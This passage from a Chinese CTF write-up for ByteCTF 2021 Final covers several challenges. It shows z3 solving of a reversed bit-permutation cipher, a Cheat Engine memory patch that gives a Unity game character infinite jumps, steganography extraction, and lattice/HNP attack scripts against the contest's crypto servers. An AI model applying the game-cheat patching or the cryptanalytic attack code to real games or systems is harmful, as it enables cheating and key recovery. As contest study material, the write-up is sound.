        0x0A, 0x08, 0x39, 0x25, 0x3C, 0x13, 0x2A, 0x0E, 0x32, 0x1A,
        0x3A, 0x18, 0x27, 0x1B, 0x15, 0x11, 0x10, 0x1D, 0x01, 0x3E,
        0x2F, 0x28, 0x33, 0x38, 0x07, 0x2B, 0x2C, 0x26, 0x1F, 0x0B,
        0x04, 0x1C, 0x3D, 0x2E, 0x05, 0x31, 0x09, 0x06, 0x17, 0x20,
        0x1E, 0x0C, 0x37, 0x16};

void sub_7FF76BB31064(char *a1)
{
    int i;                 // er10
    unsigned char v3;      // r11
    int v4;                // edi
    int v5;                // er8
    int j;                 // ebx
    int v7;                // eax
    char v8;               // dl
    char v9;               // cl
    int v10;               // ebx
    unsigned char v11;     // si
    int v12;               // eax
    char v13;              // r11
    char v14;              // cl
    unsigned char *result; // rax
    long long v16;         // xmm1_8
    unsigned char v17[24] = {0};

    for (i = 0; i < 32; ++i)
    {
        v3 = 0;
        v4 = 6 * i;
        v5 = 0;
        for (j = 5; j > -1; --j)
        {
            v7 = v4 + v5;
            v8 = (v4 + v5) & 7;
            if (v4 + v5 < 0)
            {
                v7 += 7;
                v8 -= 8;
            }
            ++v5;
            v9 = j;
            v3 ^= ((a1[v7 >> 3] >> (7 - v8)) & 1) << v9;
        }
        v10 = 0;
        v11 = byte_7FF76BB333A0[v3];
        do
        {
            v12 = v4 + v10;
            v13 = (v4 + v10) & 7;
            if (v4 + v10 < 0)
            {
                v12 += 7;
                v13 -= 8;
            }
            v14 = 5 - v10++;
            v17[v12 >> 3] ^= ((v11 >> v14) & 1) << (7 - v13);
        } while (v10 < 6); // 5个式子
    }
    memcpy(a1, v17, 24);
}

void sub_7FF76BB311B8(char *a1)
{
    int i;                 // er8
    int v3;                // er10
    int v4;                // ebx
    long long v5;          // rdi
    int v6;                // eax
    char v7;               // r11
    int v8;                // ecx
    int v9;                // edx
    unsigned char *result; // rax
    long long v11;         // xmm1_8
    unsigned char v12[24] = {0};
    for (i = 0; i < 192; i += 6)
    {
        v3 = i;
        v4 = i;
        v5 = 6;
        do
        {
            v6 = v3;
            v7 = v3 & 7;
            if (v3 < 0)
            {
                v6 = v3 + 7;
                v7 -= 8;
            }
            v8 = v4 % 192;
            v9 = (v4 % 192) & 7;
            if (v4 % 192 < 0)
            {
                v8 += 7;
                v9 -= 8;
            }
            ++v3;
            v4 += 7;
            v12[v6 >> 3] ^= ((a1[v8 >> 3] >> (7 - v9)) & 1) << (7 - v7);
            --v5;
        } while (v5);
    }
    memcpy(a1, v12, 24);
}

void print_input(char *input)
{
    for (int i = 0; i < 24; ++i)
    {
        printf("%d,", (unsigned char)input[i]);
    }
}

int main()
{
    char input[] = "123456789012345678901234";
    unsigned char sb[] = {0x11, 0xA1, 0x33, 0x03, 0x1B, 0xAB, 0x3B, 0xA3, 0x83, 0xB3, 0xA9, 0xA3, 0x81, 0xBB, 0x39, 0x13, 0x03, 0x3B, 0x19, 0x0B, 0x2D, 0x99, 0x21, 0x91};

    sub_7FF76BB31064(input);
    sub_7FF76BB311B8(input);
    sub_7FF76BB31064(input);

    for (int i = 0; i < 24; ++i)
    {
        input[i] ^= box[i];
    }

    for (int i = 0; i < 8; ++i)
    {
        sub_7FF76BB31064(input);
        sub_7FF76BB311B8(input);
        sub_7FF76BB31064(input);
        sub_7FF76BB311B8(input);
        int v33[] = {0, 1, 5, 9, 0xF, 0x15, 0x1A};
        char v38[24] = {0};

        for (int k = 0; k < 32; ++k)
        {
            for (int j = 0; j < 6; ++j)
            {
                int v20 = 6 * k + j;
                int v21 = v20 & 7;
                if (v20 < 0)
                {
                    v20 += 7;
                    v21 -= 8;
                }
                int v23 = v20 >> 3;
                int v24 = 7 - v21;
                char v25 = v38[v23];
                for (int z = 0; z < 7; ++z)
                {
                    int v26 = j + 6 * ((v33[z] + k) % 32);
                    int v27 = (j + 6 * ((v33[z] + k) % 32)) & 7;
                    if (v26 < 0)
                    {
                        v26 += 7;
                        v27 -= 8;
                    }
                    v25 ^= ((input[v26 >> 3] >> (7 - v27)) & 1) << v24;
                }
                v38[v23] = v25;
            }
        }
        for (int k = 0; k < 24; ++k)
            input[k] = v38[k] ^ box[24 + k + 24 * i];
    }

    sub_7FF76BB31064(input);
    sub_7FF76BB311B8(input);
    sub_7FF76BB31064(input);

    for (int i = 0; i < 24; ++i)
    {
        input[i] ^= sb[i];
    }

    char cmp[] = {0xE4, 0xE1, 0x3E, 0x41, 0x25, 0x9D, 0x37, 0xC8, 0xFC, 0xDE, 0x92, 0x02, 0x3A, 0xBA, 0x61, 0x5F, 0xFA, 0x16, 0xA8, 0xC3, 0x20, 0x96, 0x14, 0x35};
    print_input(cmp);
    if (!strncmp(input, cmp, 24))
        printf("success");
}

然后分为sub_7FF76BB31064,sub_7FF76BB311B8,main内循环三个部分用z3求解

sub_7FF76BB31064部分:这里约束分为两个步骤 首先是求出v11,然后字典找到v13,最后求input

// 约束生成代码 1  output 到 v11
// look.c

#include <stdio.h>
#include <string.h>

void sub_7FF76BB31064(char *a1)
{
    int i = 0;                   // er10
    unsigned char v3 = 0;        // r11
    int v4 = 0;                  // edi
    int v5 = 0;                  // er8
    int j = 0;                   // ebx
    int v7 = 0;                  // eax
    char v8 = 0;                 // dl
    char v9 = 0;                 // cl
    int v10 = 0;                 // ebx
    unsigned char v11[32] = {0}; // si
    int v12 = 0;                 // eax
    char v13 = 0;                // r11
    char v14 = 0;                // cl
    unsigned char *result;       // rax
    long long v16 = 0;           // xmm1_8
    unsigned char v17[24] = {0};

    for (i = 0; i < 32; ++i)
    {
        v3 = 0;
        v4 = 6 * i;
        v5 = 0;
        v10 = 0;
        do
        {
            v12 = v4 + v10;
            v13 = (v4 + v10) & 7;
            if (v4 + v10 < 0)
            {
                v12 += 7;
                v13 -= 8;
            }
            v14 = 5 - v10++;
            v17[v12 >> 3] ^= ((v11[i] >> v14) & 1) << (7 - v13);
            if (v12 % 8 == 0)
                printf("temp = 0\n");
            printf("temp ^= ((v11[%d] >> %d) & 1) << (7 - %d)\n", i, v14, v13);
            if (v12 % 8 == 7)
                printf("s.add(v17[%d] == temp)\n", v12 >> 3);

        } while (v10 < 6); // 5个式子
    }
    memcpy(a1, v17, 24);
}
void print_input(char *input)
{
    for (int i = 0; i < 24; ++i)
    {
        printf("%d,", (unsigned char)input[i]);
    }
}
int main()
{
    char input[] = "123456789012345678901234";
    sub_7FF76BB31064(input);
    return 0;
}
// 约束生成代码2    v13到input
// look2.c

#include <stdio.h>
#include <string.h>

unsigned char byte_7FF76BB333A0[] =
    {
        0x00, 0x36, 0x30, 0x0D, 0x0F, 0x12, 0x35, 0x23, 0x19, 0x3F,
        0x2D, 0x34, 0x03, 0x14, 0x29, 0x21, 0x3B, 0x24, 0x02, 0x22,
        0x0A, 0x08, 0x39, 0x25, 0x3C, 0x13, 0x2A, 0x0E, 0x32, 0x1A,
        0x3A, 0x18, 0x27, 0x1B, 0x15, 0x11, 0x10, 0x1D, 0x01, 0x3E,
        0x2F, 0x28, 0x33, 0x38, 0x07, 0x2B, 0x2C, 0x26, 0x1F, 0x0B,
        0x04, 0x1C, 0x3D, 0x2E, 0x05, 0x31, 0x09, 0x06, 0x17, 0x20,
        0x1E, 0x0C, 0x37, 0x16};

void sub_7FF76BB31064(char *a1)
{
    int i;                       // er10
    unsigned char v3;            // r11
    int v4;                      // edi
    int v5;                      // er8
    int j;                       // ebx
    int v7;                      // eax
    char v8;                     // dl
    char v9;                     // cl
    int v10;                     // ebx
    unsigned char v11[32] = {0}; // si
    int v12;                     // eax
    char v13;                    // r11
    char v14;                    // cl
    unsigned char *result;       // rax
    long long v16;               // xmm1_8
    unsigned char v17[24] = {0};
    int tot = 0;
    for (i = 0; i < 32; ++i)
    {
        v3 = 0;
        v4 = 6 * i;
        v5 = 0;
        for (j = 5; j > -1; --j)
        {
            v7 = v4 + v5;
            v8 = (v4 + v5) & 7;
            if (v4 + v5 < 0)
            {
                v7 += 7;
                v8 -= 8;
            }
            ++v5;
            v9 = j;
            v3 ^= ((a1[v7 >> 3] >> (7 - v8)) & 1) << v9;

            if (tot % 6 == 0)
                printf("temp = 0\n");
            printf("temp ^= ((a1[%d] >> (7 - %d)) & 1) << %d\n", v7 >> 3, v8, v9);
            if (tot % 6 == 5)
                printf("s.add(temp == find[%d])\n", i);
            tot++;
        }
        v10 = 0;
        v11[i] = byte_7FF76BB333A0[v3];
    }
    memcpy(a1, v17, 24);
}
int main()
{
    char input[] = "123456789012345678901234";
    sub_7FF76BB31064(input);

    return 0;
}

z3 求解脚本:https://www.luogu.com.cn/paste/gdydaljf

(z3脚本太大 都以云剪贴板的形式提供,luogu应该不会崩)

sub_7FF76BB311B8部分:

// 约束代码生成
// look2.c

#include <stdio.h>
#include <string.h>

void sub_7FF76BB311B8(char *a1)
{
    int i;                 // er8
    int v3;                // er10
    int v4;                // ebx
    long long v5;          // rdi
    int v6;                // eax
    char v7;               // r11
    int v8;                // ecx
    int v9;                // edx
    unsigned char *result; // rax
    long long v11;         // xmm1_8
    unsigned char v12[24] = {0};
    int tot = 0;
    for (i = 0; i < 192; i += 6)
    {
        v3 = i;
        v4 = i;
        v5 = 6;
        do
        {
            v6 = v3;
            v7 = v3 & 7;
            if (v3 < 0)
            {
                v6 = v3 + 7;
                v7 -= 8;
            }
            v8 = v4 % 192;
            v9 = (v4 % 192) & 7;
            if (v4 % 192 < 0)
            {
                v8 += 7;
                v9 -= 8;
            }
            ++v3;
            v4 += 7;
            v12[v6 >> 3] ^= ((a1[v8 >> 3] >> (7 - v9)) & 1) << (7 - v7);
            if (tot % 8 == 0)
                printf("temp = 0\n");
            printf("temp ^= ((a1[%d] >> (7 - %d)) & 1) << (7 - %d)\n", v8 >> 3, v9, v7);
            if (tot % 8 == 7)
                printf("s.add(temp == v12[%d])\n", v6 >> 3);
            tot++;
            --v5;
        } while (v5);
    }
    memcpy(a1, v12, 24);
}

void print_input(char *input)
{
    for (int i = 0; i < 24; ++i)
    {
        printf("%d,", (unsigned char)input[i]);
    }
}

int main()
{
    char input[] = "123456789012345678901234";
    sub_7FF76BB311B8(input);
    print_input(input);
    return 0;
}

z3约束脚本:https://www.luogu.com.cn/paste/k58tlpv9

main内循环部分:

// 约束带吗生成
// look4.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

unsigned char box[24 * 9] =
    {
        0x33, 0x37, 0x64, 0x35, 0x39, 0x66, 0x37, 0x61, 0x32, 0x66,
        0x37, 0x64, 0x63, 0x34, 0x30, 0x63, 0x61, 0x30, 0x34, 0x61,
        0x37, 0x62, 0x30, 0x73, 0x5F, 0x5F, 0xA9, 0x21, 0xFA, 0xED,
        0xF1, 0x36, 0xA6, 0xCD, 0xD9, 0x87, 0x9D, 0x5A, 0x90, 0xD5,
        0x0F, 0x71, 0x67, 0x0E, 0x37, 0xFF, 0xA1, 0x78, 0x58, 0x05,
        0xFD, 0x07, 0x3A, 0xD8, 0x47, 0xBC, 0xD0, 0x04, 0x3E, 0x33,
        0x08, 0x3E, 0xDD, 0x21, 0xB1, 0x71, 0xEB, 0x13, 0x53, 0x5E,
        0x58, 0x05, 0x12, 0x23, 0x77, 0x00, 0x30, 0xCC, 0xA4, 0x2E,
        0x66, 0x4B, 0xD0, 0x56, 0xC7, 0x7D, 0xE9, 0x44, 0x17, 0x76,
        0x47, 0x8A, 0x18, 0x02, 0xD2, 0x26, 0x75, 0xCF, 0x1F, 0xB3,
        0x5E, 0xD7, 0x28, 0x6A, 0x04, 0x7A, 0xEB, 0x61, 0x1F, 0x9F,
        0x61, 0x9C, 0xA8, 0x25, 0x3C, 0x43, 0x6F, 0xCF, 0xD5, 0xAF,
        0xB0, 0x92, 0xDC, 0xD3, 0x61, 0xE7, 0xA4, 0xAA, 0xC2, 0xC2,
        0x3C, 0x57, 0xDD, 0x1A, 0xB3, 0x0B, 0x83, 0x55, 0x16, 0x88,
        0x0D, 0xDD, 0x6E, 0x3D, 0x8F, 0x59, 0x49, 0xCD, 0x2C, 0x8D,
        0x6E, 0x10, 0x6E, 0x53, 0xE5, 0xDA, 0xE2, 0x64, 0x68, 0xE8,
        0x19, 0xA9, 0x60, 0x9C, 0xB5, 0xF2, 0x03, 0xFF, 0xC2, 0xB2,
        0xCC, 0xF1, 0xB3, 0x9C, 0x4E, 0xA1, 0x77, 0xF0, 0xBA, 0x99,
        0x36, 0xC0, 0x42, 0x71, 0xFC, 0x90, 0xBF, 0x72, 0x17, 0xD5,
        0xCD, 0xDF, 0x73, 0xEA, 0x1C, 0xCC, 0x40, 0x9E, 0xCB, 0xAC,
        0x4A, 0x82, 0x84, 0x35, 0x85, 0x97, 0xBE, 0xEA, 0x2E, 0x3A,
        0x83, 0xEA, 0xC5, 0xF2, 0xC5, 0xE0};

unsigned char byte_7FF76BB333A0[] =
    {
        0x00, 0x36, 0x30, 0x0D, 0x0F, 0x12, 0x35, 0x23, 0x19, 0x3F,
        0x2D, 0x34, 0x03, 0x14, 0x29, 0x21, 0x3B, 0x24, 0x02, 0x22,
        0x0A, 0x08, 0x39, 0x25, 0x3C, 0x13, 0x2A, 0x0E, 0x32, 0x1A,
        0x3A, 0x18, 0x27, 0x1B, 0x15, 0x11, 0x10, 0x1D, 0x01, 0x3E,
        0x2F, 0x28, 0x33, 0x38, 0x07, 0x2B, 0x2C, 0x26, 0x1F, 0x0B,
        0x04, 0x1C, 0x3D, 0x2E, 0x05, 0x31, 0x09, 0x06, 0x17, 0x20,
        0x1E, 0x0C, 0x37, 0x16};

void sub_7FF76BB31064(char *a1)
{
    int i;                 // er10
    unsigned char v3;      // r11
    int v4;                // edi
    int v5;                // er8
    int j;                 // ebx
    int v7;                // eax
    char v8;               // dl
    char v9;               // cl
    int v10;               // ebx
    unsigned char v11;     // si
    int v12;               // eax
    char v13;              // r11
    char v14;              // cl
    unsigned char *result; // rax
    long long v16;         // xmm1_8
    unsigned char v17[24] = {0};

    for (i = 0; i < 32; ++i)
    {
        v3 = 0;
        v4 = 6 * i;
        v5 = 0;
        for (j = 5; j > -1; --j)
        {
            v7 = v4 + v5;
            v8 = (v4 + v5) & 7;
            if (v4 + v5 < 0)
            {
                v7 += 7;
                v8 -= 8;
            }
            ++v5;
            v9 = j;
            v3 ^= ((a1[v7 >> 3] >> (7 - v8)) & 1) << v9;
        }
        v10 = 0;
        v11 = byte_7FF76BB333A0[v3];
        do
        {
            v12 = v4 + v10;
            v13 = (v4 + v10) & 7;
            if (v4 + v10 < 0)
            {
                v12 += 7;
                v13 -= 8;
            }
            v14 = 5 - v10++;
            v17[v12 >> 3] ^= ((v11 >> v14) & 1) << (7 - v13);
        } while (v10 < 6); // 5个式子
    }
    memcpy(a1, v17, 24);
}

void sub_7FF76BB311B8(char *a1)
{
    int i;                 // er8
    int v3;                // er10
    int v4;                // ebx
    long long v5;          // rdi
    int v6;                // eax
    char v7;               // r11
    int v8;                // ecx
    int v9;                // edx
    unsigned char *result; // rax
    long long v11;         // xmm1_8
    unsigned char v12[24] = {0};
    for (i = 0; i < 192; i += 6)
    {
        v3 = i;
        v4 = i;
        v5 = 6;
        do
        {
            v6 = v3;
            v7 = v3 & 7;
            if (v3 < 0)
            {
                v6 = v3 + 7;
                v7 -= 8;
            }
            v8 = v4 % 192;
            v9 = (v4 % 192) & 7;
            if (v4 % 192 < 0)
            {
                v8 += 7;
                v9 -= 8;
            }
            ++v3;
            v4 += 7;
            v12[v6 >> 3] ^= ((a1[v8 >> 3] >> (7 - v9)) & 1) << (7 - v7);
            --v5;
        } while (v5);
    }
    memcpy(a1, v12, 24);
}

void print_input(char *input)
{
    for (int i = 0; i < 24; ++i)
    {
        printf("%d,", (unsigned char)input[i]);
    }
}

int main()
{
    char input[] = "123456789012345678901234";
    unsigned char sb[] = {0x11, 0xA1, 0x33, 0x03, 0x1B, 0xAB, 0x3B, 0xA3, 0x83, 0xB3, 0xA9, 0xA3, 0x81, 0xBB, 0x39, 0x13, 0x03, 0x3B, 0x19, 0x0B, 0x2D, 0x99, 0x21, 0x91};
    int tot = 0;
    for (int i = 0; i < 1; ++i) // 改为了一次
    {
        int v33[] = {0, 1, 5, 9, 0xF, 0x15, 0x1A};
        char v38[24] = {0};

        for (int k = 0; k < 32; ++k)
        {
            for (int j = 0; j < 6; ++j)
            {
                int v20 = 6 * k + j;
                int v21 = v20 & 7;
                if (v20 < 0)
                {
                    v20 += 7;
                    v21 -= 8;
                }
                int v23 = v20 >> 3;
                int v24 = 7 - v21;
                for (int z = 0; z < 7; ++z)
                {
                    int v26 = j + 6 * ((v33[z] + k) % 32);
                    int v27 = (j + 6 * ((v33[z] + k) % 32)) & 7;
                    if (v26 < 0)
                    {
                        v26 += 7;
                        v27 -= 8;
                    }
                    v38[v23] ^= ((input[v26 >> 3] >> (7 - v27)) & 1) << v24;
                    if (tot % 56 == 0)
                        printf("temp = 0\n");

                    printf("temp ^= ((input[%d] >> (7 - %d)) & 1) << %d\n", v26 >> 3, v27, v24);
                    if (tot % 56 == 55)
                        printf("s.add(temp == v38[%d])\n", v23);
                    tot++;
                }
            }
        }
        strcpy(input, v38);
    }
    print_input(input);
    return 0;
}

z3约束脚本:https://www.luogu.com.cn/paste/emlw2khc

然后其中两次异或的值都可以动调调试出来(前面的复现源码已经提供)

之后再逆向分别调用脚本并且异或得出flag

from z3 import *

import os


sb = [0x11, 0xA1, 0x33, 0x03, 0x1B, 0xAB, 0x3B, 0xA3, 0x83, 0xB3, 0xA9, 0xA3, 0x81, 0xBB, 0x39, 0x13, 0x03, 0x3B, 0x19, 0x0B, 0x2D, 0x99, 0x21, 0x91]
box = [0x33, 0x37, 0x64, 0x35, 0x39, 0x66, 0x37, 0x61, 0x32, 0x66,
        0x37, 0x64, 0x63, 0x34, 0x30, 0x63, 0x61, 0x30, 0x34, 0x61,
        0x37, 0x62, 0x30, 0x73, 0x5F, 0x5F, 0xA9, 0x21, 0xFA, 0xED,
        0xF1, 0x36, 0xA6, 0xCD, 0xD9, 0x87, 0x9D, 0x5A, 0x90, 0xD5,
        0x0F, 0x71, 0x67, 0x0E, 0x37, 0xFF, 0xA1, 0x78, 0x58, 0x05,
        0xFD, 0x07, 0x3A, 0xD8, 0x47, 0xBC, 0xD0, 0x04, 0x3E, 0x33,
        0x08, 0x3E, 0xDD, 0x21, 0xB1, 0x71, 0xEB, 0x13, 0x53, 0x5E,
        0x58, 0x05, 0x12, 0x23, 0x77, 0x00, 0x30, 0xCC, 0xA4, 0x2E,
        0x66, 0x4B, 0xD0, 0x56, 0xC7, 0x7D, 0xE9, 0x44, 0x17, 0x76,
        0x47, 0x8A, 0x18, 0x02, 0xD2, 0x26, 0x75, 0xCF, 0x1F, 0xB3,
        0x5E, 0xD7, 0x28, 0x6A, 0x04, 0x7A, 0xEB, 0x61, 0x1F, 0x9F,
        0x61, 0x9C, 0xA8, 0x25, 0x3C, 0x43, 0x6F, 0xCF, 0xD5, 0xAF,
        0xB0, 0x92, 0xDC, 0xD3, 0x61, 0xE7, 0xA4, 0xAA, 0xC2, 0xC2,
        0x3C, 0x57, 0xDD, 0x1A, 0xB3, 0x0B, 0x83, 0x55, 0x16, 0x88,
        0x0D, 0xDD, 0x6E, 0x3D, 0x8F, 0x59, 0x49, 0xCD, 0x2C, 0x8D,
        0x6E, 0x10, 0x6E, 0x53, 0xE5, 0xDA, 0xE2, 0x64, 0x68, 0xE8,
        0x19, 0xA9, 0x60, 0x9C, 0xB5, 0xF2, 0x03, 0xFF, 0xC2, 0xB2,
        0xCC, 0xF1, 0xB3, 0x9C, 0x4E, 0xA1, 0x77, 0xF0, 0xBA, 0x99,
        0x36, 0xC0, 0x42, 0x71, 0xFC, 0x90, 0xBF, 0x72, 0x17, 0xD5,
        0xCD, 0xDF, 0x73, 0xEA, 0x1C, 0xCC, 0x40, 0x9E, 0xCB, 0xAC,
        0x4A, 0x82, 0x84, 0x35, 0x85, 0x97, 0xBE, 0xEA, 0x2E, 0x3A,
        0x83, 0xEA, 0xC5, 0xF2, 0xC5, 0xE0]
output = [] # 228,225,62,65,37,157,55,200,252,222,146,2,58,186,97,95,250,22,168,195,32,150,20,53,
res = []
def sub_7FF76BB31064():
    if os.system('python ./b.py') == 0:
        print('sub_7FF76BB31064  success')
    else:
        print('sub_7FF76BB31064  error')

def sub_7FF76BB311B8():
    if os.system('python ./c.py') == 0:
        print('sub_7FF76BB311B8  success')
    else:
        print('sub_7FF76BB311B8  error')
def www():
    if os.system('python ./d.py') == 0:
        print('www  success')
    else:
        print('www  error')


output = []
with open('output','rb+') as f:
    s = f.read().decode()
    s = s.split(',')
    for i in range(len(s)-1):
        output.append(int(s[i]))
for i in range(len(output)):
    res.append(output[i] ^ sb[i])
print(res)

with open('output','w+') as f:
    for i in range(len(res)):
        print(res[i],end=',',file=f)



sub_7FF76BB31064()
sub_7FF76BB311B8()
sub_7FF76BB31064()



for i in range(7,-1,-1):
    print('time %d'%i)
    output = []
    res = []

    with open('output','rb+') as f:
        s = f.read().decode()
        s = s.split(',')
        for k in range(len(s)-1):
            output.append(int(s[k]))
    for k in range(len(output)):
        res.append(output[k] ^ box[24 + k + 24 * i])
    with open('output','w+') as f:
        for k in range(len(res)):
            print(res[k],end=',',file=f)

    www()
    sub_7FF76BB311B8()
    sub_7FF76BB31064()
    sub_7FF76BB311B8()
    sub_7FF76BB31064()
    print('\n')



output = []
res = []
with open('output','rb+') as f:
    s = f.read().decode()
    s = s.split(',')
    for i in range(len(s)-1):
        output.append(int(s[i]))

    for i in range(len(output)):
        res.append(output[i] ^ box[i])
    with open('output','w+') as f:
        for i in range(len(res)):
            print(res[i],end=',',file=f)


print('\n')
sub_7FF76BB31064()
sub_7FF76BB311B8()
sub_7FF76BB31064()
output = []
with open('output','rb+') as f:
    s = f.read().decode()
    s = s.split(',')

    for i in range(len(s)-1):
        output.append(int(s[i]))
    print(output)
    for i in range(len(output)):
        print(chr(output[i]),end='')


# 91,143,45,174,250,174,246,228,179,110,109,57,220,13,123,70,189,52,40,142,58,234,7,23,
# 228,225,62,65,37,157,55,200,252,222,146,2,58,186,97,95,250,22,168,195,32,150,20,53,

MISC

Check in

ByteCTF 2021 Final By W&M

FPS_game

打开游戏后 发现 说flag is up on

ByteCTF 2021 Final By W&M

因为自己是做外挂的,所以很清楚知道 我们要做一个无限跳,unity游戏的判定为BOOL类型,所以CE直接附加去获取

ByteCTF 2021 Final By W&M

可以获取到该位置为跳跃判定写入的地方

ByteCTF 2021 Final By W&M

根据汇编读了一下逻辑,可以判断这个位置写入0改成1即可实现跳跃为地板

直接跳越

ByteCTF 2021 Final By W&M

ByteCTF 2021 Final By W&M

Lisa's cat

Description

Where is the cat?

Analyze

开始一张图,首先想到之前的题,看了看Ycrcb的各个的最低位

from PIL import Image
import numpy as np
from matplotlib import pyplot as plt

p = Image.open('lisa_wm.png').convert('YCbCr')
p_data = np.array(p)
a,b = p_data.shape[0],p_data.shape[1]
Y = p_data[:,:,0].reshape(a*b)
Cb = p_data[:,:,1].reshape(a*b)
Cr = p_data[:,:,2].reshape(a*b)
# Y = p_data[:,:,0]
print(Y.shape,Cb.shape,Cr.shape)
res = []
for i in Y:
    res.append(i%2)
r2Y = np.array(res).reshape(a,b)
plt.imshow(r2Y)
plt.show()

res = []
for i in Cb:
    res.append(i%2)
r2Cr = np.array(res).reshape(a,b)
plt.imshow(r2Cr)
plt.show()

res = []
for i in Cr:
    res.append(i%2)
r2Cb = np.array(res).reshape(a,b)
plt.imshow(r2Cb)
plt.show()

发现

ByteCTF 2021 Final By W&M

里面有个Hello202166

然后hint:Cat is algo说是有种猫的算法,稍微fuzz了一下找到是猫脸置乱,然后我们找到r0层的图像很奇怪而且和正常图片的r0不同

水印图片r0:

ByteCTF 2021 Final By W&M

正常图片r0:

ByteCTF 2021 Final By W&M

于是提取后对r0进行猫眼置换,爆破后发现参数a=20,b=21也正和前面的Hello202166对应(要不是爆破出来真找不到)

import numpy as np
from PIL import Image


def dearnold(img,a,b):
    r, c = img.shape[0],img.shape[1]
    p = np.zeros((r, c), np.uint8)
    a = a
    b = b
    for i in range(r):
        for j in range(c):
            x = ((a * b + 1) * i - b * j) % r
            y = (-a * i + j) % c
            p[x, y] = img[i, j]
    return p

p = np.array(Image.open('te4.png').convert('L'))
for a in range(30):
    for b in range(30):
        p = dearnold(p,a,b)
        Image.fromarray(p,'L').save('out/'+str(a)+','+str(b)+'.png')

然后得到第二个猫图

ByteCTF 2021 Final By W&M

这里十分模糊,怀疑是lisa原图片导致的,于是PS处理了一下lisa的R0图片

ByteCTF 2021 Final By W&M

这里将白点黑点去了,然后对其进行和原R0图片的xor已提取出猫眼置乱里面大部分有用的数据像素,得到图片

ByteCTF 2021 Final By W&M

进行猫眼置乱后得到

import numpy as np
from PIL import Image


def dearnold(img):
    r, c = img.shape[0],img.shape[1]
    p = np.zeros((r, c), np.uint8)
    a = 20
    b = 21
    for i in range(r):
        for j in range(c):
            x = ((a * b + 1) * i - b * j) % r
            y = (-a * i + j) % c
            p[x, y] = img[i, j]
    return p

p = np.array(Image.open('te3.png').convert('L'))
count = 0
print(count)
p = dearnold(p)
# if count == 66*66//2:
#     break
Image.fromarray(p,'L').save('out/'+str(count)+'.png')
# count+=1

ByteCTF 2021 Final By W&M

flag

ByteCTF{the Multimedia Security in ByteDance!}

Undercover

题目是一张图片,打开图片链接为:

https://p3.toutiaoimg.com/img/tos-cn-i-qvj2lq49k0/7a19b5d53d014130ab3c00f73a8d4645~tplv-yykgsuqxec-imagexlite-0bb543cf5d800a1a226c9d1fe716be95.png

ByteCTF 2021 Final By W&M

根据题目提示,将url中的img修改为origin,并删除url中不必要的部分,得到如下图片:

https://p3.toutiaoimg.com/origin/tos-cn-i-qvj2lq49k0/7a19b5d53d014130ab3c00f73a8d4645

ByteCTF 2021 Final By W&M

用010editor打开可以发现该图有exif信息,标记了作者为Zach Oakes

ByteCTF 2021 Final By W&M

搜索一下该作者名字,即可发现一个pixeljihad工具

ByteCTF 2021 Final By W&M

将origin图片利用该在线网站解密一下即可得到flag

ByteCTF 2021 Final By W&M

问卷

Crypto

overheard_plus

得到的数形式为 $y=(h<<223)+(x<<33)+l$

其中h,l未知

乘一个系数k,使得 $(k<<223)\quad mod\quad p , k$ 都比较小

构造格即可求出k

p = 87943484917385208152646744649043342751374728160181853034892216825574906226251
A = [[1,2^223,1],[0,p,0],[0,0,p]]
A = matrix(A)
print(A.LLL()[1])

(-407264873754589862949021245515678128869, -169966136630445589168644392667586870802, -407264873754589862949021245515678128869)

得到k为407264873754589862949021245515678128869

然后就转化为HNP问题

from pwn import *
from random import*
p = 87943484917385208152646744649043342751374728160181853034892216825574906226251
g = 12
bits = 33
mark = (1 << (256 - bits)) - 1
sh=remote("47.94.238.93","30001")
sh.recv().decode()
sh.sendline(b"1")
a=int(sh.recvuntil(b"\n",drop=True).decode())

print(sh.recvuntil(b"$ "))
sh.sendline(b"2")
b=int(sh.recvuntil(b"\n",drop=True).decode())
sh.recvuntil(b"$ ")

sh.sendline(b"3")
sh.sendline(str(a).encode())
sh.recvuntil(b"Bob: ")
r=(int(sh.recvuntil(b"\n").decode()))
sh.recvuntil(b"$ ")

cnt=0
k=407264873754589862949021245515678128869
B=[]
A=[]
for i in range(1,10):
    sh.sendline(b"3")
    sh.sendline(str(a*pow(g,i,p)%p).encode())
    sh.recvuntil(b"Bob: ")
    B.append(int(sh.recvuntil(b"\n").decode())*k%p)
    A.append(pow(b,i,p)*k%p)
    sh.recvuntil(b"$ ")
M=[]
s=5
k=1
for i in range(s):
    l=[0]*s
    l[i]=p*k
    if(i==s-2):
        for j in range(s-2):
            l[j]=A[j]*k
    if(i==s-1):
        for j in range(s-2):
            l[j]=B[j]*k
    M.append(l)

M[-1][-1]=2^160
m=M.copy()
m[-2][-2]=1/2^90
m=matrix(QQ,m)
print(m.LLL()[0][-1])
print(m[-1][-1])

sh.sendline(b'4')
sh.sendline(str(abs(m.LLL()[0][-2]*2^90)%p).encode())
print(sh.recvall())

forgery

from Crypto.Util.number import *
from Crypto.Cipher import AES
from random import randint
from hashlib import sha256
from curve import *
import requests

url = 'http://47.94.238.93:30002/'
Q_P_hex = '6a04ab98d9e4774ad806e302dddeb63bea16b5cb5f223ee77478e861bb583eb3' \
          '36b6fbcb60b5b3d4f1551ac45e5ffc4936466e7d98f6c7c0ec736539f74691a6'
M_hex = '654791f7bca3e1815565f63614b59bed6a0b99c3ed19098151d3f0f95cbba40a' \
        '890459f6459ff42449933fec80cd2ca5c3613f28491a26554e15de1dffd374f7'
Z_hex = '511431636a07ec6eb9d54cfda8aa559b3c09d9ff99ec84af9bcb87c47170e324' \
        '4d5c0b3d4d3692647ab92007454a2f6b6b88a860662a8e87a824284f3111b4be'
s_hex = '3c0cb0d73eb950f85b6d2f51ebc6223eba41191357a2c15f3fafa05d956d0675'
e_hex = 'cb562bf69faa92cdcb7ab2cc447f06516a01fb7c46ebcf143bba8d02ef074541'
K_hex = 'f7b804d4ca67eae2b9252a8fe4e4f0b329d1156124227e6cb0cbeb130318dd29' \
        'c614cbbfb21909516e65cfad3d650c65246e016b36e55635036e93c05d4bf045'
f_hex = '53e53621c90abe1fd78a555a62474c31c9fb5b1a339a9472b914e9b8f089d721'
v_hex = '4898a5d7c579946a7c9e2ed05fb313b868884d6880a099645895d17ea77bf87f'

def H(msg):
    return int(sha256(msg).hexdigest(), 16)

def get_x(point):
    res = long_to_bytes(point.x)
    res = b'\x00'* (32-len(res)) + res
    return res

def Make_Point(hexdata, Negate=False):
    assert len(hexdata) == 128
    return Point(int(hexdata[:64], 16), int(hexdata[64:], 16))

def get_Negate(point):
    hexdata = str(point)
    return Point(int(hexdata[:64], 16), -1*int(hexdata[64:], 16))

